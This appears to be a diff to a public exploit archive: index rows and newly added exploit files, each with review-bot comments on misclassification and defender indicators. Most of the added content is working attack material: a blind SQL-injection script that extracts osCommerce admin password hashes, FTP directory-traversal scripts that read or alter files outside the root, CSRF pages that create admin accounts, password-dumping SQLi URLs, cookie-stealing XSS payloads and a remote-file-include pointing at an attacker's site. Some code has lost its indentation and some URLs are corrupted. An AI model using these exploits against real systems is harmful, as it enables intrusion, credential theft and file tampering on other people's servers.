21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack Vulnerability",2002-06-28,"Charles Stevenson",linux,local,0
|
||||
21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability",2002-08-21,Skinnay,unix,remote,0
|
||||
21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0
|
||||
|
@ -22999,7 +22999,7 @@ id,file,description,date,author,platform,type,port
|
|||
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
|
||||
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
|
||||
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
|
||||
25912,platforms/windows/local/25912.c,"Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
|
||||
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
|
||||
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
|
||||
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
|
||||
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
|
||||
|
@ -30503,7 +30503,7 @@ id,file,description,date,author,platform,type,port
|
|||
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
|
||||
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
|
||||
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
|
||||
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
|
||||
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
|
||||
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
|
||||
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
|
||||
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
|
||||
|
@ -30660,3 +30660,15 @@ id,file,description,date,author,platform,type,port
|
|||
34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0
|
||||
34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0
|
||||
34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0
|
||||
34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",windows,remote,0
|
||||
34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 'pbx/gate' Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",multiple,remote,0
|
||||
34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
|
||||
34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
|
||||
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
|
||||
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
|
||||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 Cross Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
|
||||
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
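Review bot: The row for id 9207 keeps platform `windows` and the path `platforms/windows/local/9207.sh` after this title edit, although the title names PulseAudio setuid, the file is a shell script, and the neighbouring row 9208 for the same issue is filed under `linux`. Since the title is being touched anyway, the platform column and path probably want correcting to `linux` in the same pass; this is inferred from the visible rows, not checked against the file itself. Among the new rows, 34051 is typed `dos` with a "Directory Traversal" title, and 34058 is typed `dos` while its advisory text describes arbitrary code execution. Anyone filtering this index by platform or type for exposure triage will miss or mislabel these entries, so the classifications are worth confirming before merge.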
|
||||
|
|
|
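--- a/platforms/multiple/dos/34058.txt
+++ b/platforms/multiple/dos/34058.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40460/info
+
+DM Database Server is a database application.
+
+DM Database Server is prone to a remote memory-corruption vulnerability. This issue affects the 'CALL SP_DEL_BAK_EXPIRED' function when a large string is passed to the first argument.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');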
|
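--- a/platforms/multiple/remote/34048.html
+++ b/platforms/multiple/remote/34048.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40407/info
+
+Brekeke PBX is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected.
+
+<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>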
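Review bot: The advisory text above the markup never states the root cause, which is the part a defender needs. The `<img>` request to `pbx/gate` carries `operation=store` together with `password`, `password2` and `admin=true`, and no token parameter, so the endpoint appears to accept a state-changing user edit over GET without any anti-forgery check. I would add a line such as `Root cause: the user-edit action is accepted via GET without a CSRF token; fix by requiring POST plus a per-session token.` The same gap applies to platforms/windows/remote/34047.html, whose request passes `addnewmember` and `pass` in the same way.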
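--- a/platforms/php/webapps/34049.txt
+++ b/platforms/php/webapps/34049.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40415/info
+
+Layout CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Layout CMS 1.0 is vulnerable; other versions may be affected.
+
+http://www.example.com/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
+http://www.example.com/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E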
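--- a/platforms/php/webapps/34052.py
+++ b/platforms/php/webapps/34052.py
@@ -0,0 +1,95 @@
+source: http://www.securityfocus.com/bid/40425/info
+
+osCommerce Visitor Web Stats is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+import sys
+import http.client
+
+if len(sys.argv) < 2:
+print("usage: " + sys.argv[0] + " <host> [<path>]")
+sys.exit();
+
+host = sys.argv[1]
+if len(sys.argv) > 2:
+path = sys.argv[2]
+else:
+path = "/"
+
+def req(lang):
+c = http.client.HTTPConnection(host)
+c.request('GET', path, '', {'Accept-Language': lang})
+return c.getresponse().read();
+
+def check(condition):
+r = req("' AND 1=0 UNION SELECT id FROM administrators " + condition
++ " -- '")
+if r.find(b'update') != -1:
+return 1;
+elif r.find(b'Unknown column') != -1:
+print('Unknown database structure (no rc version?)')
+sys.exit();
+return 0;
+
+if req("'").find(b'select counter FROM visitors where browser_ip') == -1:
+print('Target does not seem to have (a vulnarable version of)
+Visitor Web Stats or doesn\'t output any error messages')
+sys.exit();
+
+admin_count = 1
+while not check("HAVING COUNT(*) = " + str(admin_count)):
+admin_count += 1;
+print("Number of admins: " + str(admin_count))
+
+pw_chars = [x for x in range(48, 58)]
+pw_chars.extend([x for x in range(97, 103)])
+pw_chars.sort()
+
+todo = [('', 0, 255)]
+while len(todo):
+(found, start, end) = todo.pop()
+if start == 0 and end == 255 and check("WHERE user_name = '" + found
++ "'"):
+sys.stdout.write(found + " ")
+sys.stdout.flush()
+for i in range(35):
+if i == 32:
+sys.stdout.write(":")
+sys.stdout.flush()
+continue
+pw_start, pw_end = 0, len(pw_chars) - 1
+while pw_start != pw_end:
+pw_mid = int((pw_start + pw_end) / 2)
+if check("WHERE user_name = '" + found + "'
+AND ORD(SUBSTRING(user_password, " + str(i + 1) + ", 1)) <= " +
+str(pw_chars[pw_mid])):
+pw_end = pw_mid
+else:
+if pw_mid == pw_end - 1:
+pw_start = pw_end
+else:
+pw_start = pw_mid
+sys.stdout.write(chr(pw_chars[pw_start]))
+sys.stdout.flush()
+print()
+if not check("WHERE SUBSTRING(user_name, 1, " +
+str(len(found)) + ") = '" + found + "' AND SUBSTRING(user_name, " +
+str(len(found) + 1) + ", 1) > 0"):
+continue;
+mid = int((start + end) / 2)
+if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
+'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
+1)) <= " + str(mid) + " AND ORD(SUBSTRING(user_name, " + str(len(found) + 1)
++ ", 1)) > 0"):
+if mid == start + 1:
+todo.append((found + chr(mid), 0, 255))
+else:
+todo.append((found, start, mid))
+if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
+'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
+1)) > " + str(mid)):
+if mid == end - 1:
+todo.append((found + chr(end), 0, 255))
+else:
+todo.append((found, mid, end))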
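Review bot: Nothing in this file tells a defender what to look for or how the flaw is closed, and the advisory lines at the top name no affected version. The script's own probes supply usable indicators: `req()` places SQL text in the `Accept-Language` request header, and the first check depends on the page echoing the failed query (`select counter FROM visitors where browser_ip`). I would add a short header comment, for example `# Detection: quotes or UNION SELECT in the Accept-Language header; SQL error text in responses.` followed by `# Mitigation: use a parameterized SQL statement for the header value and disable database error output.` Access logs often omit this header, so the comment should also say that it has to be logged explicitly.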
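--- a/platforms/php/webapps/34053.txt
+++ b/platforms/php/webapps/34053.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/40431/info
+
+ImpressPages CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ImpressPages CMS 1.0.4 is vulnerable; prior versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++
+
+http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc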
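--- a/platforms/php/webapps/34054.txt
+++ b/platforms/php/webapps/34054.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40437/info
+
+GR Board is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+This issue affects version 1.8.6.1; other versions may also be vulnerable.
+
+http://www.example.com/path/page.php?theme=http://attacker's site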
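--- a/platforms/php/webapps/34055.txt
+++ b/platforms/php/webapps/34055.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/40442/info
+
+CMScout is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The following example input to the 'search' field is available:
+<marquee><font color=Blue size=15>XroGuE</font></marquee>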
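--- a/platforms/php/webapps/34056.txt
+++ b/platforms/php/webapps/34056.txt
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/40444/info
+
+Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Joomla! versions prior to 1.5.18.
+
+http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
+http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_categories§ion=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_categories§ion=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_categories§ion=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_categories§ion=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
+http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E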
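--- a/platforms/php/webapps/34057.txt
+++ b/platforms/php/webapps/34057.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40447/info
+
+wsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script>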
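--- a/platforms/windows/dos/34051.py
+++ b/platforms/windows/dos/34051.py
@@ -0,0 +1,74 @@
+source: http://www.securityfocus.com/bid/40422/info
+
+Core FTP Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Core FTP Server 1.0.343 is vulnerable; other versions may also be affected.
+
+import sys, socket, re
+
+host = 'localhost'
+port = 21
+user = 'anonymous'
+password = 'a'
+
+buffer_size = 8192
+timeout = 8
+
+def recv(s):
+resp = ''
+
+while 1:
+r = s.recv(buffer_size)
+if not r: break
+resp += r
+
+return resp
+
+def list_root():
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.settimeout(timeout)
+
+print s.recv(buffer_size)
+
+s.send('USER ' + user + '\r\n')
+print s.recv(buffer_size)
+
+s.send('PASS ' + password + '\r\n')
+print s.recv(buffer_size) + s.recv(buffer_size)
+
+s.send('CWD ' + '/...' * 16 + '\r\n')
+
+resp = s.recv(buffer_size)
+
+print resp
+
+if resp[:3] == '250':
+s.send('PASV\r\n')
+resp = s.recv(buffer_size)
+
+print resp
+
+pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)
+
+if (pasv_info == None):
+print 'Invalid PASV response: ' + resp
+return
+
+s.send('LIST\r\n')
+
+s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
+s2.settimeout(timeout)
+
+print recv(s2)
+
+s.close()
+
+except Exception:
+print sys.exc_info()
+
+list_root()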
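Review bot: This file is added under `platforms/windows/dos/`, but its own header describes a directory traversal that lets an attacker view local files, and `list_root()` only sends `CWD`, `PASV` and `LIST`; nothing in it is a denial of service. Anyone filtering the archive by type to assess exposure would miss it, so I would move it to `platforms/windows/remote/` next to 34050.py and change the `dos` type in its files.csv row to match. A one-line comment naming the indicator would also help defenders, for example `# Indicator: CWD with repeated '/...' segments answered by 250, followed by PASV and LIST`.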
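--- a/platforms/windows/remote/34047.html
+++ b/platforms/windows/remote/34047.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40405/info
+
+Home FTP Server is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Home FTP Server 1.10.3 (build 144) is vulnerable; other versions may be affected.
+
+<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html>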
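--- a/platforms/windows/remote/34050.py
+++ b/platforms/windows/remote/34050.py
@@ -0,0 +1,111 @@
+source: http://www.securityfocus.com/bid/40419/info
+
+Home FTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to download, upload, and delete arbitrary files outside of the FTP server's root directory. This may aid in further attacks.
+
+Home FTP Server 1.10.2.143 and 1.11.1.149 are vulnerable; other versions may also be affected.
+
+#============================================================================================================#
+# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
+# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
+# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
+# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
+# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
+# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
+# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
+# #
+#============================================================================================================#
+# #
+# Vulnerability............Directory Traversal #
+# Software.................Home FTP Server 1.10.2.143 #
+# Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe #
+# Date.....................5/27/10 #
+# #
+#============================================================================================================#
+# #
+# Site.....................http://cross-site-scripting.blogspot.com/ #
+# Email....................john.leitch5@gmail.com #
+# #
+#============================================================================================================#
+# #
+# ##Description## #
+# #
+# A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and #
+# delete files outside of the ftp root directory. #
+# #
+# #
+# ##Exploit## #
+# #
+# RETR [Drive Letter]:\[Filename] #
+# STOR [Drive Letter]:\[Filename] #
+# DELE [Drive Letter]:\[Filename] #
+# #
+# #
+# ##Proof of Concept## #
+# #
+import sys, socket, re
+
+host = 'localhost'
+port = 21
+user = 'anonymous'
+password = ''
+
+timeout = 8
+
+buffer_size = 8192
+
+def get_data_port(s):
+s.send('PASV\r\n')
+
+resp = s.recv(buffer_size)
+
+pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)
+
+if (pasv_info == None):
+raise Exception(resp)
+
+return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))
+
+def retr_file(s, filename):
+pasv_port = get_data_port(s)
+
+if (pasv_port == None):
+return None
+
+s.send('RETR ' + filename + '\r\n')
+resp = s.recv(8192)
+
+if resp[:3] != '150': raise Exception(resp)
+
+print resp
+
+s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s2.connect((host, pasv_port))
+s2.settimeout(2.0)
+resp = s2.recv(8192)
+s2.close()
+
+return resp
+
+def get_file(filename):
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.settimeout(timeout)
+
+print s.recv(buffer_size)
+
+s.send('USER ' + user + '\r\n')
+print s.recv(buffer_size)
+
+s.send('PASS ' + password + '\r\n')
+print s.recv(buffer_size)
+
+print retr_file(s, filename)
+
+print s.recv(buffer_size)
+
+s.close()
+
+get_file('c:\\boot.ini')
+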
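Review bot: The version information disagrees inside this file: the advisory lines at the top say 1.10.2.143 and 1.11.1.149 are vulnerable, while the banner's `Software` and `##Description##` entries name only 1.10.2.143, and the files.csv title repeats the narrower claim. I would add `1.11.1.149` to the banner or state which source is authoritative, because someone triaging exposure by version will likely read only one of them. The banner also carries no defender guidance; a comment such as `# Indicator: RETR/STOR/DELE with a drive-letter path from an anonymous session; mitigate by disabling anonymous login` would cover it. In `retr_file()`, the `pasv_port == None` branch looks unreachable, since `get_data_port()` raises on a bad PASV reply instead of returning None.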